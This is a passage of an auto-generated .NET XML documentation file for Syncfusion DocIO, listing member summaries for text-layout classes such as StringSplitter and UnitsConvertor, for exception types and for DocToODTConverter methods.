            </summary>
            <returns>Reads text to the end.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.IsWhitespace(System.String)">
            <summary>
            Indicates whether user specified token is whitespace symbols or not.
            </summary>
            <param name="token">Token to check.</param>
            <returns>True if token is whitespace; False otherwise.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.IsSpace(System.Char)">
            <summary>
            Indicates whether user specified token is whitespace symbols or not.
            </summary>
            <param name="token">Token to check.</param>
            <returns>True if token is whitespace; False otherwise.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.IsTab(System.Char)">
            <summary>
            Indicates whether user specified token is tab symbols or not.
            </summary>
            <param name="token">Token to check.</param>
            <returns>True if token is whitespace; False otherwise.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.GetWhitespaceCount(System.String,System.Boolean)">
            <summary>
            Calculates number of the whitespace symbols at the start or at the end of the line.
            </summary>
            <param name="line">String line.</param>
            <param name="start">If true - check start of the line, end of the line otherwise.</param>
            <returns>Number of the whitespace symbols at the start or at the end of the line.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.Contains(System.Char[],System.Char)">
            <summary>
            Checks whether array contains a symbol.
            </summary>
            <param name="array">Array of symbols.</param>
            <param name="symbol">Char symbol.</param>
            <returns>True - if comtains, False otherwise.</returns>
        </member>
        <member name="P:Syncfusion.Layouting.StringParser.EOF">
            <summary>
            Gets value indicating whether there is and of the data.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.StringParser.Length">
            <summary>
            Gets text length.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.StringParser.Position">
            <summary>
            Gets current position.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.StringSplitter">
            <summary>
            Class for splitting text.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.StringSplitter"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.Split(System.String,System.Drawing.Graphics,System.Drawing.Font,System.Drawing.Font,System.Drawing.StringFormat,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WCharacterFormat,System.Boolean@,System.Boolean,System.Boolean@)">
            <summary>
            Splits the specified text.
            </summary>
            <param name="text">The text.</param>
            <param name="graphics">The graphics.</param>
            <param name="font">The font.</param>
            <param name="format">The format.</param>
            <param name="size">The size.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.DoSplit(System.Boolean@,System.String,System.Drawing.Font,System.Drawing.Font,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.Drawing.SizeF,System.Boolean,System.Boolean@)">
            <summary>
            Does the split.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.CopyToResult(Syncfusion.Layouting.StringSplitResult,Syncfusion.Layouting.StringSplitResult,System.Collections.Generic.List{Syncfusion.Layouting.TextLineInfo},System.Int32@,System.Drawing.Font,System.Drawing.Font,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.Drawing.SizeF)">
            <summary>
            Copies to result.
            </summary>
            <param name="result">The result.</param>
            <param name="lineResult">The line result.</param>
            <param name="lines">The lines.</param>
            <param name="numInserted">The num inserted.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.SaveResult(Syncfusion.Layouting.StringSplitResult,System.Collections.Generic.List{Syncfusion.Layouting.TextLineInfo},Syncfusion.Layouting.StringParser,System.Drawing.Font,System.String)">
            <summary>
            Finalizes final result.
            </summary>
            <param name="result">Final result.</param>
            <param name="lines">Lines array.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.GetLineHeight(System.Drawing.Font)">
            <summary>
            Calculates height of the line.
            </summary>
            <returns>Height of the line.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.SplitLine(System.String,System.Single,System.Boolean@,System.Drawing.Font,System.Drawing.Font,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.Drawing.SizeF,System.Boolean,System.Boolean@)">
            <summary>
            Splits line.
            </summary>
            <param name="line">Text line.</param>
            <param name="lineIndent">Line indent.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.AddToLineResult(Syncfusion.Layouting.StringSplitResult,System.Collections.Generic.List{Syncfusion.Layouting.TextLineInfo},System.String,System.Single,Syncfusion.Layouting.TextLineType,System.Drawing.Font)">
            <summary>
            Adds line to line result.
            </summary>
            <param name="lineResult">Line resut.</param>
            <param name="lines">Array of the lines.</param>
            <param name="line">Text line.</param>
            <param name="lineWidth">Line width.</param>
            <param name="breakType">Line break type.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.TrimLine(Syncfusion.Layouting.TextLineInfo,System.Boolean,System.Drawing.Font,System.Drawing.Font,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.Drawing.SizeF)">
            <summary>
            Trims whitespaces at the line.
            </summary>
            <param name="info">Line info.</param>
            <param name="firstLine">Indicates whether the line is the first in the text.</param>
            <returns>Trimed line info.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.GetLineWidth(System.String,System.Drawing.Font,System.Drawing.Font,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Calculates width of the line.
            </summary>
            <param name="line">String line.</param>
            <returns>Width of the line.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.GetLineIndent(System.Boolean,System.Drawing.StringFormat,System.Drawing.SizeF)">
            <summary>
            Returns line indent for the line.
            </summary>
            <param name="firstLine">If true - the line is the first in the text.</param>
            <returns>Line indent for the line.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitter.GetWrapType(System.Drawing.StringFormat)">
            <summary>
            Returns wrap type.
            </summary>
            <returns>Returns wrap type.</returns>
        </member>
        <member name="T:Syncfusion.Layouting.StringSplitResult">
            <summary>
            Represents the result.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringSplitResult.Lines">
            <summary>
            Layouted lines.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringSplitResult.Remainder">
            <summary>
            The text wasn't lay outed.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringSplitResult.ActualSize">
            <summary>
            Actual layouted text bounds.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringSplitResult.LineHeight">
            <summary>
            Height of the line.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.StringSplitResult.Empty">
            <summary>
            Gets value that indicates whether any text was layouted.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.StringSplitResult.Count">
            <summary>
            Gets number of the lines layouted.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TextLineInfo">
            <summary>
            Contains information about the line.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineInfo.Line">
            <summary>
            Line text.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineInfo.Width">
            <summary>
            Width of the text.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineInfo.LineType">
            <summary>
            Breaking type of the line.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.StringSplitInfo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringSplitInfo.m_firstPos">
            <summary>
            The position of first symbol
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringSplitInfo.m_lastPos">
            <summary>
            The position of last symbol
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.#ctor">
            <summary>
            Disabled default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.#ctor(System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.StringSplitInfo"/> class.
            </summary>
            <param name="firstPos">The first pos.</param>
            <param name="lastPos">The last pos.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.Check(System.Int32)">
            <summary>
            Checks the specified length.
            </summary>
            <param name="length">The length.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.Extend(Syncfusion.Layouting.StringSplitInfo)">
            <summary>
            Extends the specified STR split info.
            </summary>
            <param name="strSplitInfo">The STR split info.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.GetSplitFirstPart(System.Int32)">
            <summary>
            Gets the split first part.
            </summary>
            <param name="position">The position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.GetSplitSecondPart(System.Int32)">
            <summary>
            Gets the split second part.
            </summary>
            <param name="position">The position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringSplitInfo.GetSubstring(System.String)">
            <summary>
            Gets the substring.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.StringSplitInfo.FirstPos">
            <summary>
            Gets the first position.
            </summary>
            <value>The first position.</value>
        </member>
        <member name="P:Syncfusion.Layouting.StringSplitInfo.LastPos">
            <summary>
            Gets the last position.
            </summary>
            <value>The last position.</value>
        </member>
        <member name="P:Syncfusion.Layouting.StringSplitInfo.Length">
            <summary>
            Gets the length.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.Layouting.FontMetric">
            <summary>
            Helper class, used for getting font ascent/descent
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.FontMetric.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.FontMetric"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.FontMetric.Ascent(System.Drawing.Font)">
            <summary>
            Gets the ascent.
            </summary>
            <value>The ascent.</value>
        </member>
        <member name="M:Syncfusion.Layouting.FontMetric.Descent(System.Drawing.Font)">
            <summary>
            Gets the descent.
            </summary>
            <value>The descent.</value>
        </member>
        <member name="T:Syncfusion.Layouting.Spacings">
            <summary>
            Implements a Rectangle like behavior.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Spacings.Left">
            <summary>
            Gets or sets the left.
            </summary>
            <value>The left.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Spacings.Top">
            <summary>
            Gets or sets the top.
            </summary>
            <value>The top.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Spacings.Right">
            <summary>
            Gets or sets the right.
            </summary>
            <value>The right.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Spacings.Bottom">
            <summary>
            Gets or sets the bottom.
            </summary>
            <value>The bottom.</value>
        </member>
        <member name="T:Syncfusion.Layouting.PrintUnits">
            <summary>
            Known to us measure units.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Display">
            <summary>
            Specifies 1/75 inch as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Document">
            <summary>
            Specifies the document unit (1/300 inch) as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Inch">
            <summary>
            Specifies the inch as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Millimeter">
            <summary>
            Specifies the millimeter as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Centimeter">
            <summary>
            Specifies the centimeter as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Pixel">
            <summary>
            Specifies a device pixel as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.Point">
            <summary>
            Specifies a printers point (1/72 inch) as the unit of measure.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.PrintUnits.EMU">
            <summary>
            Specifies the English Metric Units as the unit of measure
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.UnitsConvertor">
            <summary>
            Class allow to convert differ metrics units. Convert is 
            based on Graphics object DPI settings that is why for differ
            graphics settings must be created new instance. For example:
            printers often has 300 and greater dpi resolution, for compare
            default display screen dpi is 96.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.UnitsConvertor.STANDART_DPI">
            <summary>
            Standart picture DPI.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.UnitsConvertor.m_Proportions">
            <summary>
            Matrix for conversations between different numeric systems
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.#ctor">
            <summary>
            Prevent class creation
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.#ctor(System.Drawing.Graphics)">
            <summary>
            Create Units convert class based on specified Graphics units
            </summary>
            <param name="g">Graphics for measuring</param>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertUnits(System.Double,Syncfusion.Layouting.PrintUnits,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Converts value, stored in "from" units, to value in "to" units
            </summary>
            <param name="value">Value to convert</param>
            <param name="from">Indicates units to convert from</param>
            <param name="to">Indicates units to convert to</param>
            <returns>Value stored in "to" units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Single,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Converts value, stored in "from" units, to pixels
            </summary>
            <param name="value">Value to convert</param>
            <param name="from">Indicates units to convert from</param>
            <returns>Value stored in pixels</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Double,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Converts value, stored in "from" units, to pixels
            </summary>
            <param name="value">Value to convert</param>
            <param name="from">Indicates units to convert from</param>
            <returns>Value stored in pixels</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Drawing.RectangleF,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert rectangle location and size to Pixels from specified 
            measure units
            </summary>
            <param name="rect">source rectangle</param>
            <param name="from">source rectangle measure units</param>
            <returns>Rectangle with Pixels</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Drawing.PointF,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert point from specified measure units to pixels
            </summary>
            <param name="point">source point for convert</param>
            <param name="from">measure units</param>
            <returns>point in pixels coordinates</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Drawing.SizeF,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert size from specified measure units to pixels
            </summary>
            <param name="size">source size</param>
            <param name="from">measure units</param>
            <returns>size in pixels</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Single,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Converts value, stored in pixels, to value in "to" units
            </summary>
            <param name="value">Value to convert</param>
            <param name="to">Indicates units to convert to</param>
            <returns>Value stored in "to" units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Double,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Converts value, stored in pixels, to value in "to" units
            </summary>
            <param name="value">Value to convert</param>
            <param name="to">Indicates units to convert to</param>
            <returns>Value stored in "to" units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Drawing.RectangleF,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert rectangle in Pixels into rectangle with specified 
            measure units
            </summary>
            <param name="rect">source rectangle in pixels units</param>
            <param name="to">convert to units</param>
            <returns>output Rectangle in specified units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Drawing.PointF,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert rectangle from pixels to specified units
            </summary>
            <param name="point">point in pixels units</param>
            <param name="to">convert to units</param>
            <returns>output Point in specified units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Drawing.Size,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert Size in pixels to size in specified measure units
            </summary>
            <param name="size">source size</param>
            <param name="to">convert to units</param>
            <returns>output size in specified measure units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Drawing.SizeF,Syncfusion.Layouting.PrintUnits)">
            <summary>
            Convert Size in pixels to size in specified measure units
            </summary>
            <param name="size">source size</param>
            <param name="to">convert to units</param>
            <returns>output size in specified measure units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Single,Syncfusion.Layouting.PrintUnits,System.Single)">
            <summary>
            Converts to pixels.
            </summary>
            <param name="value">The value.</param>
            <param name="from">From.</param>
            <param name="dpi">The dpi.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertToPixels(System.Double,Syncfusion.Layouting.PrintUnits,System.Single)">
            <summary>
            Converts to pixels.
            </summary>
            <param name="value">The value.</param>
            <param name="from">From.</param>
            <param name="dpi">The dpi.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Single,Syncfusion.Layouting.PrintUnits,System.Single)">
            <summary>
            Converts from pixels.
            </summary>
            <param name="value">The value.</param>
            <param name="to">To.</param>
            <param name="dpi">The dpi.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Double,Syncfusion.Layouting.PrintUnits,System.Single)">
            <summary>
            Converts from pixels.
            </summary>
            <param name="value">The value.</param>
            <param name="to">To.</param>
            <param name="dpi">The dpi.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.ConvertFromPixels(System.Drawing.SizeF,Syncfusion.Layouting.PrintUnits,System.Single)">
            <summary>
            Convert Size in pixels to size in specified measure units
            </summary>
            <param name="size">source size</param>
            <param name="to">convert to units</param>
            <param name="dpi">The dpi.</param>
            <returns>output size in specified measure units</returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.GetProporsion(System.Single)">
            <summary>
            Gets the proporsion.
            </summary>
            <param name="dpi">The dpi.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.InitDefProporsions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.UnitsConvertor.UpdateProportions(System.Drawing.Graphics)">
            <summary>
            Update proportions matrix according to Graphics settings
            </summary>
            <param name="g">reference to graphics</param>
        </member>
        <member name="P:Syncfusion.Layouting.UnitsConvertor.EmptyGraphics">
            <summary>
            Get Empty graphics created on Bitmap
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.UnitsConvertor.Instance">
            <summary>
            Gets an instance of units converter.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.HAlignment">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.HAlignment.Left">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.HAlignment.Center">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.HAlignment.Right">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.HAlignment.Justify">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.HAlignment.Distributed">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.LayoutState">
            <summary>
            Represents state information of LayoutContext object
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.Unknown">
            <summary>
            Unknown state, set by itialization of LayoutContext
            <remarks>Cann't returned to parent context</remarks>
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.NotFitted">
            <summary>
            Current context contains at last one child. Layouting process on 
            current level not finished. 
            <remarks>Cann't returned to parent context</remarks>
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.Splitted">
            <summary>
            Current context contains at last one child. Last widget 
            ( or child context ) was splitted.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.WrapText">
            <summary>
            Wrap string based on TextWrapBounds
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.Fitted">
            <summary>
            Current context contains at last one child. Layouting process 
            finished. 
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.Breaked">
            <summary>
            Current context contains at last one child. Layouting process 
            breaked. 
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutState.DynamicRelayout">
            <summary>
            Layoutted content need to relayout. Layouting process. 
            DynamicRelayout. 
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TabJustification">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabJustification.Left">
            <summary>
            Left tab.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabJustification.Centered">
            <summary>
            Centered tab.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabJustification.Right">
            <summary>
            Right tab.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabJustification.Decimal">
            <summary>
            Decimal tab.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabJustification.Bar">
            <summary>
            Bar.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TabLeader">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabLeader.NoLeader">
            <summary>
            No leader.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabLeader.Dotted">
            <summary>
            Dotted leader.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabLeader.Hyphenated">
            <summary>
            Hyphenated leader.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabLeader.Single">
            <summary>
            Single line leader. 
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabLeader.Heavy">
            <summary>
            Heavy line leader.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ChildrenLayoutDirection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ChildrenLayoutDirection.Horizontal">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ChildrenLayoutDirection.Vertical">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TextLineType">
            <summary>
            Break type of the line.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineType.None">
            <summary>
            Unknown type line.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineType.NewLineBreak">
            <summary>
            The line has new line symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineType.LayoutBreak">
            <summary>
            layout break.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineType.FirstParagraphLine">
            <summary>
            The line is the first in the paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TextLineType.LastParagraphLine">
            <summary>
            The line is the last in the paragraph.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.SortPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.SortPosition.X">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.SortPosition.Y">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.SortPosition.Bottom">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.StreamReadException">
            <summary>
            Summary description for StreamReadError.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.StreamReadException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.StreamReadException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.StreamReadException.#ctor(System.Exception)">
             <summary>
            
             </summary>
             <param name="innerExc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.StreamReadException.#ctor(System.String)">
             <summary>
            
             </summary>
             <param name="message"></param>
        </member>
        <member name="M:Syncfusion.DocIO.StreamReadException.#ctor(System.String,System.Exception)">
             <summary>
            
             </summary>
             <param name="message"></param>
             <param name="innerExc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.StreamReadException.#ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext)">
             <summary>
            
             </summary>
             <param name="info"></param>
             <param name="context"></param>
        </member>
        <member name="T:Syncfusion.DocIO.StreamWriteException">
            <summary>
            Summary description for StreamReadError.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.StreamWriteException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.StreamWriteException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.StreamWriteException.#ctor(System.Exception)">
             <summary>
            
             </summary>
             <param name="innerExc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.StreamWriteException.#ctor(System.String)">
             <summary>
            
             </summary>
             <param name="message"></param>
        </member>
        <member name="M:Syncfusion.DocIO.StreamWriteException.#ctor(System.String,System.Exception)">
             <summary>
            
             </summary>
             <param name="message"></param>
             <param name="innerExc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.StreamWriteException.#ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext)">
             <summary>
            
             </summary>
             <param name="info"></param>
             <param name="context"></param>
        </member>
        <member name="T:Syncfusion.DocIO.FileCorruptException">
            <summary>
            Summary description for StreamReadError.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FileCorruptException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.FileCorruptException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.FileCorruptException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.FileCorruptException"/> class.
            </summary>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.FileCorruptException.#ctor(System.String)">
            <summary>
            Throws Exception when document appears to be corrupted and impossible.
            </summary>
            <param name="message"></param>
        </member>
        <member name="M:Syncfusion.DocIO.FileCorruptException.#ctor(System.String,System.Exception)">
            <summary>
            Throws Exception when document appears to be corrupted and impossible.
            </summary>
            <param name="message"></param>
            <param name="innerExc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.FileCorruptException.#ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext)">
            <summary>
            Throws Exception when document appears to be corrupted and impossible.
            </summary>
            <param name="info"></param>
            <param name="context"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.ConvertDocToODFSectionProperties(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Converts the WordDocument Section properties into ODF Section properties
            </summary>
            <param name="section"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.ConvertToValidXmlString(System.String)">
            <summary>
            Updates the text, that cannot be represented in Xml as defined by XML 1.0 specification.
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.IsValidXmlChar(System.UInt16)">
            <summary>
            Checks for the valid xml character.
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetNextDocPrID" -->
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.UpdateShapeId(Syncfusion.DocIO.DLS.WPicture,System.Boolean,System.Boolean,Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Update the shape id.
            </summary>
            <param name="pic"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.AddImageRelation(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.DLS.ImageRecord},Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Adds the image relation.
            </summary>
            <param name="imageCollection">The image collection.</param>
            <param name="imageRecord">The image record.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetNextRelationShipID">
            <summary>
            Get the next relationship ID
            </summary>
            <returns>returns the next relationship ID</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.ResetRelationShipID">
            <summary>
            Reset the relationship id counter
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetPictureOwner(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Get the picture owner.
            </summary>
            <param name="pic"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetOleObjectOwner(Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            
            </summary>
            <param name="oleObject"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.LoadHeaderFooterContents(Syncfusion.DocIO.DLS.WHeadersFooters,ODF.Base.ODFImplementation.MasterPage)">
            <summary>
            Loads the header footer contents
            </summary>
            <param name="headersFooters"></param>
            <param name="page"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetHeaderFooterContent(ODF.Base.ODFImplementation.HeaderFooterContent,Syncfusion.DocIO.DLS.HeaderFooter)">
            <summary>
            Gets the HeaderFooter content
            </summary>
            <param name="oHeaderFooter"></param>
            <param name="headerFooter"></param>
